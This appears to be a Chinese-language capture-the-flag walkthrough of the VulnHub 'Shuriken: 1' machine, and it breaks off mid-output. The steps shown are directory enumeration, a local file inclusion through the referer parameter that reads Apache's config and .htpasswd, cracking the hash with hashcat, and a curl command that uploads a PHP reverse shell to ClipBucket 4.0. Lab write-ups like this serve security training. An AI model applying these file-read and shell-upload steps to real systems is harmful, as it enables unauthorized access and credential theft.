Shuriken: 1
vulnhub地址:http://www.vulnhub.com/entry/shuriken-1,600/
0x01 信息收集到获取shell
服务器只开放了80端口,dirb爬取目录。
==> DIRECTORY: http://192.168.56.121/css/
==> DIRECTORY: http://192.168.56.121/img/
+ http://192.168.56.121/index.php (CODE:200|SIZE:6021)
==> DIRECTORY: http://192.168.56.121/js/
==> DIRECTORY: http://192.168.56.121/secret/
最初以为secret目录下secret.png图片做了信息隐藏,一顿操作没有找到任何信息。反过来查看index.php页面的js,发现了有意思的东西。
修改hosts
后访问http://broadcast.shuriken.local
,发现需要basic auth
。
于是尝试另一个请求http://shuriken.local/index.php?referer=
,读取到了apache2的默认配置文件/etc/apache2/sites-enabled/000-default.conf
。
继续读/etc/apach2/.htpasswd
,得到了用户名和加密密码developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0
。
用hashcat结合rockyou字典破解密码为9972761drmfsls
。
kali@kali:~$ hashcat -m 1600 -a 0 1.txt /usr/share/wordlists/rockyou.txt --show
$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0:9972761drmfsls
进入系统,发现是clipbucket4.0。
在exploit-db上搜到一个利用:https://www.exploit-db.com/exploits/44250
,成功上传shell。
kali@kali:~$ curl --basic --user "developers:9972761drmfsls" -F "file=@php_reverse_shell.php" -F "plupload=1" -F "name=anyname.php" http://broadcast.shuriken.local/actions/beats_uploader.php
{
"success":"yes","file_name":"1606